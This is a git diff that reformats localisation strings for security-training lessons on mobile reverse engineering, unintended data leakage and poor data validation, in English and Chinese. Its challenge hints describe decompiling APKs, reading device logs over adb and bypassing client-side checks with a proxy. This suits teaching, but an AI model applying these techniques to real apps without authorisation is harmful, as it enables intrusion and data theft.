+button.showIntro = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9_zh.properties b/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9_zh.properties
index 90a8ab80d..e75fad107 100644
--- a/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9_zh.properties
+++ b/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9_zh.properties
@@ -1,7 +1,10 @@
-title.question.m_reverse_engineering=\u4EC0\u4E48\u662F\u79FB\u52A8\u9006\u5411\u5DE5\u7A0B?
-paragraph.info.1=\u5BF9\u4E8E\u79FB\u52A8\u5E94\u7528\u6700\u5927\u7684\u5371\u9669\u4E4B\u4E00\u5C31\u662F\u9006\u5411\u5DE5\u7A0B,\u64CD\u4F5C\u7B80\u5355,\u5BB9\u6613\u5B8C\u6210,\u5E76\u53EF\u4EE5\u63ED\u793A\u6E90\u4EE3\u7801,API\u5BC6\u94A5,\u52A0\u5BC6\u5BC6\u5319,\u9690\u85CF\u7BA1\u7406\u5458\u529F\u80FD\u6216\u786C\u7F16\u7801\u53E3\u4EE4.\u5F00\u53D1\u4EBA\u5458\u53EF\u4EE5\u901A\u8FC7\u6DF7\u6DC6\u4EE3\u7801\u6765\u8FBE\u5230\u8BA9\u653B\u51FB\u8005\u66F4\u96BE\u8BFB\u53D6\u4EE3\u7801\u7684\u76EE\u7684.\u540C\u65F6,\u5728\u4E00\u4E9B\u60C5\u51B5\u4E0B,\u6DF7\u6DC6\u4EE3\u7801\u5C31\u662F\u552F\u4E00\u7684\u9632\u7EBF.
-paragraph.info.2=ProGuard\u662F\u4E00\u9879\u7531Android SDK\u81EA\u5E26\u7684,\u53EF\u7528\u4E8E\u4F18\u5316,\u7F29\u5C0F\u548C\u6DF7\u6DC6\u4EE3\u7801\u7684\u5DE5\u5177.\u6DF7\u6DC6\u53EF\u4EE5\u589E\u52A0\u9006\u5411\u5DE5\u7A0B\u8BE5APK\u7684\u4EBA\u8BFB\u53D6\u4EE3\u7801\u7684\u96BE\u5EA6.\u5C3D\u7BA1ProGuard\u662F\u4E00\u4E2A\u975E\u5E38\u597D\u7684\u5DE5\u5177,\u4F46\u5B83\u5E76\u4E0D\u80FD\u4FDD\u8BC1\u4F60\u7684\u4EE3\u7801\u7684\u5B89\u5168.ProGuard\u5E94\u8BE5\u88AB\u4E00\u76F4\u4F7F\u7528,\u57FA\u4E8E\u5B83\u5176\u5B83\u7684\u597D\u5904,\u4F46\u4E5F\u53EA\u80FD\u51CF\u7F13\u653B\u51FB\u8005\u6536\u96C6\u4FE1\u606F\u7684\u901F\u5EA6,\u5E76\u4E0D\u80FD\u7EC8\u6B62\u653B\u51FB\u8005\u627E\u5230\u654F\u611F\u4FE1\u606F.
-paragraph.info.3=\u5176\u4ED6\u6DF7\u6DC6\u6280\u672F\u5305\u542B\u4E0D\u4EC5\u4F7F\u4EE3\u7801\u66F4\u96BE\u88AB\u8BFB\u53D6,\u4E5F\u8BA9\u4EE3\u7801\u66F4\u52A0\u6DF7\u4E71.\u4E0E\u5176\u4F7F\u7528\u786C\u7F16\u7801\u5B57\u7B26\u4E32\u6BD4\u8F83,\u5E94\u7528\u7A0B\u5E8F\u4E0D\u5982\u4F7F\u7528\u4E00\u4E2A\u51FD\u6570\u68C0\u67E5\u5BC6\u7801\u7684\u6709\u6548\u6027.
-challenge.description=Dex2Jar \u548C JD-GUI\u662F\u4E24\u4E2A\u4F60\u5C06\u9700\u8981\u7528\u4E8E\u9006\u5411\u5DE5\u7A0B\u7684APK\u7684\u5DE5\u5177.\u4E00\u65E6\u4F60\u6709\u8FD9\u4E9B\u5DE5\u5177\u548C\u76EE\u6807APK,\u4F7F\u7528dex2jar\u5C06APK\u8F6C\u6362\u5230jar\u6587\u4EF6,\u7136\u540E\u7528JD-GUI\u6253\u5F00.jar\u6587\u4EF6.\u5BF9\u8BE5\u8BFE\u7A0B\u4F7F\u7528\u6B64\u65B9\u6CD5\u5E76\u8C03\u67E5\u6E90\u4EE3\u7801\u83B7\u53D6\u7ED3\u679C\u7684\u94A5\u5319.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+title.question.m_reverse_engineering = \u4EC0\u4E48\u662F\u79FB\u52A8\u9006\u5411\u5DE5\u7A0B?
+
+paragraph.info.1 = \u5BF9\u4E8E\u79FB\u52A8\u5E94\u7528\u6700\u5927\u7684\u5371\u9669\u4E4B\u4E00\u5C31\u662F\u9006\u5411\u5DE5\u7A0B,\u64CD\u4F5C\u7B80\u5355,\u5BB9\u6613\u5B8C\u6210,\u5E76\u53EF\u4EE5\u63ED\u793A\u6E90\u4EE3\u7801,API\u5BC6\u94A5,\u52A0\u5BC6\u5BC6\u5319,\u9690\u85CF\u7BA1\u7406\u5458\u529F\u80FD\u6216\u786C\u7F16\u7801\u53E3\u4EE4.\u5F00\u53D1\u4EBA\u5458\u53EF\u4EE5\u901A\u8FC7\u6DF7\u6DC6\u4EE3\u7801\u6765\u8FBE\u5230\u8BA9\u653B\u51FB\u8005\u66F4\u96BE\u8BFB\u53D6\u4EE3\u7801\u7684\u76EE\u7684.\u540C\u65F6,\u5728\u4E00\u4E9B\u60C5\u51B5\u4E0B,\u6DF7\u6DC6\u4EE3\u7801\u5C31\u662F\u552F\u4E00\u7684\u9632\u7EBF.
+paragraph.info.2 = ProGuard\u662F\u4E00\u9879\u7531Android SDK\u81EA\u5E26\u7684,\u53EF\u7528\u4E8E\u4F18\u5316,\u7F29\u5C0F\u548C\u6DF7\u6DC6\u4EE3\u7801\u7684\u5DE5\u5177.\u6DF7\u6DC6\u53EF\u4EE5\u589E\u52A0\u9006\u5411\u5DE5\u7A0B\u8BE5APK\u7684\u4EBA\u8BFB\u53D6\u4EE3\u7801\u7684\u96BE\u5EA6.\u5C3D\u7BA1ProGuard\u662F\u4E00\u4E2A\u975E\u5E38\u597D\u7684\u5DE5\u5177,\u4F46\u5B83\u5E76\u4E0D\u80FD\u4FDD\u8BC1\u4F60\u7684\u4EE3\u7801\u7684\u5B89\u5168.ProGuard\u5E94\u8BE5\u88AB\u4E00\u76F4\u4F7F\u7528,\u57FA\u4E8E\u5B83\u5176\u5B83\u7684\u597D\u5904,\u4F46\u4E5F\u53EA\u80FD\u51CF\u7F13\u653B\u51FB\u8005\u6536\u96C6\u4FE1\u606F\u7684\u901F\u5EA6,\u5E76\u4E0D\u80FD\u7EC8\u6B62\u653B\u51FB\u8005\u627E\u5230\u654F\u611F\u4FE1\u606F.
+paragraph.info.3 = \u5176\u4ED6\u6DF7\u6DC6\u6280\u672F\u5305\u542B\u4E0D\u4EC5\u4F7F\u4EE3\u7801\u66F4\u96BE\u88AB\u8BFB\u53D6,\u4E5F\u8BA9\u4EE3\u7801\u66F4\u52A0\u6DF7\u4E71.\u4E0E\u5176\u4F7F\u7528\u786C\u7F16\u7801\u5B57\u7B26\u4E32\u6BD4\u8F83,\u5E94\u7528\u7A0B\u5E8F\u4E0D\u5982\u4F7F\u7528\u4E00\u4E2A\u51FD\u6570\u68C0\u67E5\u5BC6\u7801\u7684\u6709\u6548\u6027.
+
+challenge.description = Dex2Jar \u548C JD-GUI\u662F\u4E24\u4E2A\u4F60\u5C06\u9700\u8981\u7528\u4E8E\u9006\u5411\u5DE5\u7A0B\u7684APK\u7684\u5DE5\u5177.\u4E00\u65E6\u4F60\u6709\u8FD9\u4E9B\u5DE5\u5177\u548C\u76EE\u6807APK,\u4F7F\u7528dex2jar\u5C06APK\u8F6C\u6362\u5230jar\u6587\u4EF6,\u7136\u540E\u7528JD-GUI\u6253\u5F00.jar\u6587\u4EF6.\u5BF9\u8BE5\u8BFE\u7A0B\u4F7F\u7528\u6B64\u65B9\u6CD5\u5E76\u8C03\u67E5\u6E90\u4EE3\u7801\u83B7\u53D6\u7ED3\u679C\u7684\u94A5\u5319.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
diff --git a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.properties b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.properties
index 6e698c060..b353d36b8 100644
--- a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.properties
+++ b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.properties
@@ -1,15 +1,18 @@
-title.question.m_uninteded_data_leakage=What is Mobile Unintended Data Leakage?
-paragraph.info.1=Unintended data leakage occurs when an App inadvertently places sensitive information or data in a location on the mobile device that is accessible by attackers or other Apps on the device.
-paragraph.list.header=Unintended Data Leakage comes in many forms, including
-paragraph.list.1=URL Caching (Both request and response)
-paragraph.list.2=Keyboard Press Caching
-paragraph.list.3=Copy/Paste buffer Caching
-paragraph.list.4=Application backgrounding
-paragraph.list.5=Logging
-paragraph.list.6=HTML5 data storage
-paragraph.list.7=Browser cookie objects
-paragraph.list.8=Analytic data sent to third parties
-paragraph.info.2=Collecting logs can be done with the Android Debug Bridge Once you know the IP of a mobile device, you can perform the command adb connect followed with adb logcat to see the any Logs the App is generating.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=Apps won't always use a SQLite database to store data. In some cases, logs yield useful information about the App and its users. Use this information to find the result key. In this lesson, the App caches logs on the device. The App itself acts as a notice board or to do list. Everything a user adds to the ListView in the App is logged.
\ No newline at end of file
+title.question.m_uninteded_data_leakage = What is Mobile Unintended Data Leakage?
+
+paragraph.info.1 = Unintended data leakage occurs when an App inadvertently places sensitive information or data in a location on the mobile device that is accessible by attackers or other Apps on the device.
+paragraph.list.header = Unintended Data Leakage comes in many forms, including
+paragraph.list.1 = URL Caching (Both request and response)
+paragraph.list.2 = Keyboard Press Caching
+paragraph.list.3 = Copy/Paste buffer Caching
+paragraph.list.4 = Application backgrounding
+paragraph.list.5 = Logging
+paragraph.list.6 = HTML5 data storage
+paragraph.list.7 = Browser cookie objects
+paragraph.list.8 = Analytic data sent to third parties
+paragraph.info.2 = Collecting logs can be done with the Android Debug Bridge Once you know the IP of a mobile device, you can perform the command adb connect followed with adb logcat to see the any Logs the App is generating.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = Apps won't always use a SQLite database to store data. In some cases, logs yield useful information about the App and its users. Use this information to find the result key. In this lesson, the App caches logs on the device. The App itself acts as a notice board or to do list. Everything a user adds to the ListView in the App is logged.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_.properties b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_.properties
index 3a88cca2f..cf23f10aa 100644
--- a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_.properties
+++ b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_.properties
@@ -1,16 +1,19 @@
-title.question.m_uninteded_data_leakage=\u4EC0\u4E48\u662F\u79FB\u52A8\u6570\u636E\u610F\u5916\u6CC4\u6F0F?
-paragraph.info.1=\u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u4E0D\u7ECF\u610F\u5730\u5C06\u654F\u611F\u4FE1\u606F\u6216\u6570\u636E\u653E\u7F6E\u5728\u4E00\u4E2A\u53EF\u88AB\u653B\u51FB\u8005\u6216\u5176\u4ED6\u5E94\u7528\u8BBF\u95EE\u7684\u79FB\u52A8\u8BBE\u5907.
-paragraph.list.header=\u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F88\u591A\u4E0D\u540C\u7684\u5F62\u5F0F,\u5305\u62EC
-paragraph.list.1=URL \u7F13\u5B58 (Both request and response)
-paragraph.list.2=\u6309\u952E\u76D8\u7F13\u5B58
-paragraph.list.3=\u590D\u5236/\u7C98\u8D34\u7F13\u51B2\u533A\u9AD8\u901F\u7F13\u5B58
-paragraph.list.4=\u5E94\u7528\u7A0B\u5E8F\u540E\u53F0
-paragraph.list.5=\u767B\u5F55
-paragraph.list.6=HTML5 \u6570\u636E\u5B58\u50A8
-paragraph.list.7=\u6D4F\u89C8\u5668 cookie \u5BF9\u8C61
-paragraph.list.8=\u5206\u6790\u6570\u636E\u53D1\u9001\u5230\u7B2C\u4E09\u65B9
-paragraph.info.2=\u6536\u96C6\u65E5\u5FD7\u53EF\u4EE5\u901A\u8FC7Android\u8C03\u8BD5\u6865\u6765\u5B8C\u6210,\u4E00\u65E6\u4F60\u77E5\u9053\u4E00\u4E2A\u79FB\u52A8\u8BBE\u5907\u7684IP,\u4F60\u5C31\u53EF\u4EE5\u6267\u884C\u547D\u4EE4adb\u8FDE\u63A5,\u63A5\u7740adb logcat\u53BB\u770B\u5E94\u7528\u4E2D\u751F\u6210\u7684\u4EFB\u4F55\u65E5\u5FD7.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u5E94\u7528\u7A0B\u5E8F\u4E0D\u4F1A\u603B\u662F\u4F7F\u7528SQLite\u6570\u636E\u5E93\u6765\u50A8\u5B58\u6570\u636E.\u5728\u67D0\u4E9B\u60C5\u51B5\u4E0B,\u65E5\u5FD7\u4EA7\u751F\u6709\u7528\u7684\u5173\u4E8E\u8BE5\u5E94\u7528\u548C\u5B83\u7684\u7528\u6237\u7684\u4FE1\u606F.\u4F7F\u7528\u8FD9\u4E9B\u4FE1\u606F\u627E\u5230\u7ED3\u679C\u7684\u94A5\u5319.\u5728\u8BE5\u8BFE\u4E2D,\u5E94\u7528\u7684\u7F13\u5B58\u65E5\u5FD7\u5728\u8BBE\u5907\u4E0A.\u8FD9\u4E2A\u5E94\u7528\u672C\u8EAB\u4F5C\u4E3A\u4E00\u4E2A\u544A\u793A\u677F\u6216\u5F85\u529E\u4E8B\u9879\u6E05\u5355.\u7528\u6237\u6DFB\u52A0\u5230App\u7684ListView\u7684\u4E00\u5207\u90FD\u5DF2\u7ECF\u88AB\u8BB0\u5F55\u4E0B\u6765.
+title.question.m_uninteded_data_leakage = \u4EC0\u4E48\u662F\u79FB\u52A8\u6570\u636E\u610F\u5916\u6CC4\u6F0F?
+
+paragraph.info.1 = \u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u4E0D\u7ECF\u610F\u5730\u5C06\u654F\u611F\u4FE1\u606F\u6216\u6570\u636E\u653E\u7F6E\u5728\u4E00\u4E2A\u53EF\u88AB\u653B\u51FB\u8005\u6216\u5176\u4ED6\u5E94\u7528\u8BBF\u95EE\u7684\u79FB\u52A8\u8BBE\u5907.
+paragraph.list.header = \u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F88\u591A\u4E0D\u540C\u7684\u5F62\u5F0F,\u5305\u62EC
+paragraph.list.1 = URL \u7F13\u5B58 (Both request and response)
+paragraph.list.2 = \u6309\u952E\u76D8\u7F13\u5B58
+paragraph.list.3 = \u590D\u5236/\u7C98\u8D34\u7F13\u51B2\u533A\u9AD8\u901F\u7F13\u5B58
+paragraph.list.4 = \u5E94\u7528\u7A0B\u5E8F\u540E\u53F0
+paragraph.list.5 = \u767B\u5F55
+paragraph.list.6 = HTML5 \u6570\u636E\u5B58\u50A8
+paragraph.list.7 = \u6D4F\u89C8\u5668 cookie \u5BF9\u8C61
+paragraph.list.8 = \u5206\u6790\u6570\u636E\u53D1\u9001\u5230\u7B2C\u4E09\u65B9
+paragraph.info.2 = \u6536\u96C6\u65E5\u5FD7\u53EF\u4EE5\u901A\u8FC7Android\u8C03\u8BD5\u6865\u6765\u5B8C\u6210,\u4E00\u65E6\u4F60\u77E5\u9053\u4E00\u4E2A\u79FB\u52A8\u8BBE\u5907\u7684IP,\u4F60\u5C31\u53EF\u4EE5\u6267\u884C\u547D\u4EE4adb\u8FDE\u63A5,\u63A5\u7740adb logcat\u53BB\u770B\u5E94\u7528\u4E2D\u751F\u6210\u7684\u4EFB\u4F55\u65E5\u5FD7.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u5E94\u7528\u7A0B\u5E8F\u4E0D\u4F1A\u603B\u662F\u4F7F\u7528SQLite\u6570\u636E\u5E93\u6765\u50A8\u5B58\u6570\u636E.\u5728\u67D0\u4E9B\u60C5\u51B5\u4E0B,\u65E5\u5FD7\u4EA7\u751F\u6709\u7528\u7684\u5173\u4E8E\u8BE5\u5E94\u7528\u548C\u5B83\u7684\u7528\u6237\u7684\u4FE1\u606F.\u4F7F\u7528\u8FD9\u4E9B\u4FE1\u606F\u627E\u5230\u7ED3\u679C\u7684\u94A5\u5319.\u5728\u8BE5\u8BFE\u4E2D,\u5E94\u7528\u7684\u7F13\u5B58\u65E5\u5FD7\u5728\u8BBE\u5907\u4E0A.\u8FD9\u4E2A\u5E94\u7528\u672C\u8EAB\u4F5C\u4E3A\u4E00\u4E2A\u544A\u793A\u677F\u6216\u5F85\u529E\u4E8B\u9879\u6E05\u5355.\u7528\u6237\u6DFB\u52A0\u5230App\u7684ListView\u7684\u4E00\u5207\u90FD\u5DF2\u7ECF\u88AB\u8BB0\u5F55\u4E0B\u6765.
diff --git a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_zh.properties b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_zh.properties
index 3a88cca2f..cf23f10aa 100644
--- a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_zh.properties
+++ b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_zh.properties
@@ -1,16 +1,19 @@
-title.question.m_uninteded_data_leakage=\u4EC0\u4E48\u662F\u79FB\u52A8\u6570\u636E\u610F\u5916\u6CC4\u6F0F?
-paragraph.info.1=\u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u4E0D\u7ECF\u610F\u5730\u5C06\u654F\u611F\u4FE1\u606F\u6216\u6570\u636E\u653E\u7F6E\u5728\u4E00\u4E2A\u53EF\u88AB\u653B\u51FB\u8005\u6216\u5176\u4ED6\u5E94\u7528\u8BBF\u95EE\u7684\u79FB\u52A8\u8BBE\u5907.
-paragraph.list.header=\u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F88\u591A\u4E0D\u540C\u7684\u5F62\u5F0F,\u5305\u62EC
-paragraph.list.1=URL \u7F13\u5B58 (Both request and response)
-paragraph.list.2=\u6309\u952E\u76D8\u7F13\u5B58
-paragraph.list.3=\u590D\u5236/\u7C98\u8D34\u7F13\u51B2\u533A\u9AD8\u901F\u7F13\u5B58
-paragraph.list.4=\u5E94\u7528\u7A0B\u5E8F\u540E\u53F0
-paragraph.list.5=\u767B\u5F55
-paragraph.list.6=HTML5 \u6570\u636E\u5B58\u50A8
-paragraph.list.7=\u6D4F\u89C8\u5668 cookie \u5BF9\u8C61
-paragraph.list.8=\u5206\u6790\u6570\u636E\u53D1\u9001\u5230\u7B2C\u4E09\u65B9
-paragraph.info.2=\u6536\u96C6\u65E5\u5FD7\u53EF\u4EE5\u901A\u8FC7Android\u8C03\u8BD5\u6865\u6765\u5B8C\u6210,\u4E00\u65E6\u4F60\u77E5\u9053\u4E00\u4E2A\u79FB\u52A8\u8BBE\u5907\u7684IP,\u4F60\u5C31\u53EF\u4EE5\u6267\u884C\u547D\u4EE4adb\u8FDE\u63A5,\u63A5\u7740adb logcat\u53BB\u770B\u5E94\u7528\u4E2D\u751F\u6210\u7684\u4EFB\u4F55\u65E5\u5FD7.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u5E94\u7528\u7A0B\u5E8F\u4E0D\u4F1A\u603B\u662F\u4F7F\u7528SQLite\u6570\u636E\u5E93\u6765\u50A8\u5B58\u6570\u636E.\u5728\u67D0\u4E9B\u60C5\u51B5\u4E0B,\u65E5\u5FD7\u4EA7\u751F\u6709\u7528\u7684\u5173\u4E8E\u8BE5\u5E94\u7528\u548C\u5B83\u7684\u7528\u6237\u7684\u4FE1\u606F.\u4F7F\u7528\u8FD9\u4E9B\u4FE1\u606F\u627E\u5230\u7ED3\u679C\u7684\u94A5\u5319.\u5728\u8BE5\u8BFE\u4E2D,\u5E94\u7528\u7684\u7F13\u5B58\u65E5\u5FD7\u5728\u8BBE\u5907\u4E0A.\u8FD9\u4E2A\u5E94\u7528\u672C\u8EAB\u4F5C\u4E3A\u4E00\u4E2A\u544A\u793A\u677F\u6216\u5F85\u529E\u4E8B\u9879\u6E05\u5355.\u7528\u6237\u6DFB\u52A0\u5230App\u7684ListView\u7684\u4E00\u5207\u90FD\u5DF2\u7ECF\u88AB\u8BB0\u5F55\u4E0B\u6765.
+title.question.m_uninteded_data_leakage = \u4EC0\u4E48\u662F\u79FB\u52A8\u6570\u636E\u610F\u5916\u6CC4\u6F0F?
+
+paragraph.info.1 = \u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u4E0D\u7ECF\u610F\u5730\u5C06\u654F\u611F\u4FE1\u606F\u6216\u6570\u636E\u653E\u7F6E\u5728\u4E00\u4E2A\u53EF\u88AB\u653B\u51FB\u8005\u6216\u5176\u4ED6\u5E94\u7528\u8BBF\u95EE\u7684\u79FB\u52A8\u8BBE\u5907.
+paragraph.list.header = \u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F88\u591A\u4E0D\u540C\u7684\u5F62\u5F0F,\u5305\u62EC
+paragraph.list.1 = URL \u7F13\u5B58 (Both request and response)
+paragraph.list.2 = \u6309\u952E\u76D8\u7F13\u5B58
+paragraph.list.3 = \u590D\u5236/\u7C98\u8D34\u7F13\u51B2\u533A\u9AD8\u901F\u7F13\u5B58
+paragraph.list.4 = \u5E94\u7528\u7A0B\u5E8F\u540E\u53F0
+paragraph.list.5 = \u767B\u5F55
+paragraph.list.6 = HTML5 \u6570\u636E\u5B58\u50A8
+paragraph.list.7 = \u6D4F\u89C8\u5668 cookie \u5BF9\u8C61
+paragraph.list.8 = \u5206\u6790\u6570\u636E\u53D1\u9001\u5230\u7B2C\u4E09\u65B9
+paragraph.info.2 = \u6536\u96C6\u65E5\u5FD7\u53EF\u4EE5\u901A\u8FC7Android\u8C03\u8BD5\u6865\u6765\u5B8C\u6210,\u4E00\u65E6\u4F60\u77E5\u9053\u4E00\u4E2A\u79FB\u52A8\u8BBE\u5907\u7684IP,\u4F60\u5C31\u53EF\u4EE5\u6267\u884C\u547D\u4EE4adb\u8FDE\u63A5,\u63A5\u7740adb logcat\u53BB\u770B\u5E94\u7528\u4E2D\u751F\u6210\u7684\u4EFB\u4F55\u65E5\u5FD7.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u5E94\u7528\u7A0B\u5E8F\u4E0D\u4F1A\u603B\u662F\u4F7F\u7528SQLite\u6570\u636E\u5E93\u6765\u50A8\u5B58\u6570\u636E.\u5728\u67D0\u4E9B\u60C5\u51B5\u4E0B,\u65E5\u5FD7\u4EA7\u751F\u6709\u7528\u7684\u5173\u4E8E\u8BE5\u5E94\u7528\u548C\u5B83\u7684\u7528\u6237\u7684\u4FE1\u606F.\u4F7F\u7528\u8FD9\u4E9B\u4FE1\u606F\u627E\u5230\u7ED3\u679C\u7684\u94A5\u5319.\u5728\u8BE5\u8BFE\u4E2D,\u5E94\u7528\u7684\u7F13\u5B58\u65E5\u5FD7\u5728\u8BBE\u5907\u4E0A.\u8FD9\u4E2A\u5E94\u7528\u672C\u8EAB\u4F5C\u4E3A\u4E00\u4E2A\u544A\u793A\u677F\u6216\u5F85\u529E\u4E8B\u9879\u6E05\u5355.\u7528\u6237\u6DFB\u52A0\u5230App\u7684ListView\u7684\u4E00\u5207\u90FD\u5DF2\u7ECF\u88AB\u8BB0\u5F55\u4E0B\u6765.
diff --git a/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.properties b/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.properties
index f57c74a78..4d6d2a1a3 100644
--- a/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.properties
+++ b/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.properties
@@ -1,16 +1,20 @@
-title.question.poor_data_validation=What is Poor Data Validation?
-paragraph.info.1=Poor Data Validation occurs when an application does not validate submitted data correctly or sufficiently. Poor Data Validation application issues are generally low severity, they are more likely to be coupled with other security risks to increase their impact. If all data submitted to an application is validated correctly, security risks are significantly more difficult to exploit.
-paragraph.info.2=Attackers can take advantage of poor data validation to perform business logic attacks or cause server errors.
-paragraph.info.3=When data is submitted to a web application, it should ensure that the data is strongly typed, has correct syntax, is within length boundaries, contains only permitted characters and within range boundaries. The data validation process should ideally be performed on the client side and again on the server side.
-button.showIntro=Show Lesson Introduction
-button.hideIntro=Hide Lesson Introduction
-button.loading=Loading
-button.submitNumber=Submit Number
-button.hint=Would you like a hint
-challenge.description=To get the result key to this lesson, you must bypass the validation in the following function and submit a negative number.
-challenge.hintHeader=Lesson Hint
-challenge.hint=The lesson only validates the number on the client side. Try use your proxy to change the data after it has left the browser.
-challenge.enterNumber=Enter a Number
-error.noNumber=A number must be submitted
-error.badNumber=Invalid Number: Number must be greater than 0
-error.occured=An Error Occurred
\ No newline at end of file
+title.question.poor_data_validation = What is Poor Data Validation?
+
+paragraph.info.1 = Poor Data Validation occurs when an application does not validate submitted data correctly or sufficiently. Poor Data Validation application issues are generally low severity, they are more likely to be coupled with other security risks to increase their impact. If all data submitted to an application is validated correctly, security risks are significantly more difficult to exploit.
+paragraph.info.2 = Attackers can take advantage of poor data validation to perform business logic attacks or cause server errors.
+paragraph.info.3 = When data is submitted to a web application, it should ensure that the data is strongly typed, has correct syntax, is within length boundaries, contains only permitted characters and within range boundaries. The data validation process should ideally be performed on the client side and again on the server side.
+
+button.showIntro = Show Lesson Introduction
+button.hideIntro = Hide Lesson Introduction
+button.loading = Loading
+button.submitNumber = Submit Number
+button.hint = Would you like a hint
+
+challenge.description = To get the result key to this lesson, you must bypass the validation in the following function and submit a negative number.
+challenge.hintHeader = Lesson Hint
+challenge.hint = The lesson only validates the number on the client side. Try use your proxy to change the data after it has left the browser.
+challenge.enterNumber = Enter a Number
+
+error.noNumber = A number must be submitted
+error.badNumber = Invalid Number: Number must be greater than 0
+error.occured = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f_zh.properties b/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f_zh.properties
index 608b4d3e3..4dd1dd2cc 100644
--- a/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f_zh.properties
+++ b/src/main/resources/i18n/lessons/poor_data_validation/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f_zh.properties
@@ -1,16 +1,20 @@
-title.question.poor_data_validation=\u4EC0\u4E48\u662F\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1?
